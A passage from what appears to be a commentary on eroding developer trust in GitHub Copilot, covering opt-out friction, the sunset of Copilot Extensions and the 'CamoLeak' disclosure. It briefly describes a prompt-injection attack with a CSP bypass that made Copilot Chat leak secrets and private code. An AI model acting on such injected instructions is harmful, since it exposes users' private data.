
We see this most clearly in the friction around opting out. In 2025, Microsoft and GitHub challenged developer trust by pushing Copilot deeper into core workflows without giving maintainers clean, reliable control over it. For example, two of the most upvoted GitHub Community threads in the prior 12 months were requests to block Copilot-generated issues and pull requests, and to fix the inability to disable automatic Copilot code reviews.
Beyond this friction, GitHub has made ecosystem-level shifts that feel like rug pulls to integrators. In a move that shocked many, they announced a hard sunset for Copilot Extensions built as GitHub Apps, blocking new creation after September 24, 2025, and enforcing full disablement by November 10, 2025. By explicitly telling developers this was a replacement rather than a migration as they pivoted to Model Context Protocol servers, GitHub violated the cardinal rule of “boring” infrastructure. Stability is supposed to be the feature, not API churn.
And just to round it out, Copilot’s security posture took a very public hit when researchers disclosed “CamoLeak,” a critical Copilot Chat vulnerability that could exfiltrate secrets and private code from private repos via prompt injection and a CSP bypass, which GitHub mitigated in part by disabling image rendering in Copilot Chat. Put those together and the trust problem is not that AI exists, it’s the perception that Copilot is becoming unavoidable infrastructure, while simultaneously being subject to churn and occasional sharp edges that are hard to justify when the product is supposed to be the boring, dependable layer.

